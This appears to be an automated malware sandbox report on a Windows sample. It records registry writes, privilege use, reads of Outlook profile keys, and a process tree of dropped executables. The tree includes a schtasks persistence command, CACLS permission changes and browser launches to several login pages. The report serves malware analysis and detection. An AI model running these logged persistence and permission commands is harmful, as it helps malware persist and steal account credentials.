| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Qw72en.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\35B5.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\3BD2.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\A791.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\A791.exe | N/A |
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\0c9c2b2e01cde2f57e44e47e1535d99c384299cf58246d3b54738437b862199e.exe
"C:\Users\Admin\AppData\Local\Temp\0c9c2b2e01cde2f57e44e47e1535d99c384299cf58246d3b54738437b862199e.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Iv3wi58.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Iv3wi58.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\fI8YT47.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\fI8YT47.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\eM7DD79.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\eM7DD79.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ar4Xn47.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ar4Xn47.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\hE3IM58.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\hE3IM58.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1nK16BK9.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1nK16BK9.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2lG0309.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2lG0309.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Qw72en.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Qw72en.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 376 -p 4288 -ip 4288
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4288 -s 540
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4pd309gA.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4pd309gA.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5sW5Ys6.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5sW5Ys6.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Ld4fR2.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Ld4fR2.exe
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "explothe.exe" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "explothe.exe" /P "Admin:R" /E
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Wp4fv41.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Wp4fv41.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\fefffe8cea" /P "Admin:N"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\EB3B.tmp\EB3C.tmp\EB3D.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Wp4fv41.exe"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\fefffe8cea" /P "Admin:R" /E
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ff9784046f8,0x7ff978404708,0x7ff978404718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff9784046f8,0x7ff978404708,0x7ff978404718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff9784046f8,0x7ff978404708,0x7ff978404718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff9784046f8,0x7ff978404708,0x7ff978404718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff9784046f8,0x7ff978404708,0x7ff978404718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,3714206868020881863,11430497258023133463,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
